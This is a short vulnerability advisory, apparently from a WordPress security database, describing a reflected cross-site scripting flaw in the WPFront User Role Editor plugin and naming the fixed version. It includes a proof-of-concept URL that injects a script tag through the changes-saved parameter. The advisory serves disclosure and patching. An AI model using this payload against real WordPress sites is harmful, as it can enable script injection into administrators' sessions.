WordPress Plugin Vulnerabilities
WPFront User Role Editor < 3.2.1.11184 - Reflected Cross-Site Scripting
Description
The plugin does not sanitise and escape the changes-saved parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting
Proof of Concept
https://example.com/wp-admin/admin.php?page=wpfront-user-role-editor-bulk-edit&screen=add-remove-cap&submit=Next+Step&changes-saved=%3Cscript%3Ealert%28/XSS/%29%3C%2Fscript%3E
Affects Plugins
Fixed in version 3.2.1.11184
References
Classification
Miscellaneous
Original Researcher
JrXnm
Submitter
JrXnm
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-11-23 (about 6 months ago)
Added
2021-11-23 (about 6 months ago)
Last Updated
2022-04-11 (about 1 months ago)